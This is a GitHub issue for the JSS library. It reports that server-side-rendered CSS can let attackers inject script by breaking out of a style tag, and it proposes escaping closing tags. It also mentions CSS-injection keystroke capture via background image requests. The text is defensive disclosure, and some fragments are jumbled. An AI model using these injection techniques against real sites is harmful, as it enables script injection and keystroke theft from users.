Ensure escaping during SSR #1265
Labels
bug
It went crazy and killed everyone.
complexity:high
Best brains need to talk about it.
help wanted
important
The thing you do when you wake up!
Script injection
Expected behavior:
CSS rendered serverside needs HTML escaping by default because of script injection attack.
Describe the bug:
There is a known security issue with rendering CSS serverside and interpolating user content into it. It's the same issue that plagues all backend frameworks forever. React is very explicit about it by providing only one way to render unescaped HTML using
dangerouslySetInnerHTML
In JSS this is also possible since any enduser's value can be used and if devs (JSS users) don't escape the attacker can do this:
In the case of JSS this is only possible with SSR, because the techniques we use on the client
style.textContent
andsheet.insertRule
don't evaluate HTML.Codesandbox link:
https://codesandbox.io/s/elated-jepsen-qox0m
Versions (please complete the following information):
Solution:
When we call
registry.toString()
we can escape closing tags example implementation I don't know if we need to escape anything else except of the closing</style
tag, since this is the only way I can think of how an attacker can inject script. Let me know if there is any other way.content
property or urls of backgrounds, which will result in undesired effects.CSS injection attack
There is another attack vector with CSS injection, which is discussed here.
The problem is well described by @jamesknelson https://frontarm.com/james-k-nelson/how-can-i-use-css-in-js-securely/
TLDR if attacker is able to inject custom CSS, they can capture key strokes and send requests using background images more about it here
Same issue at styled components
The text was updated successfully, but these errors were encountered: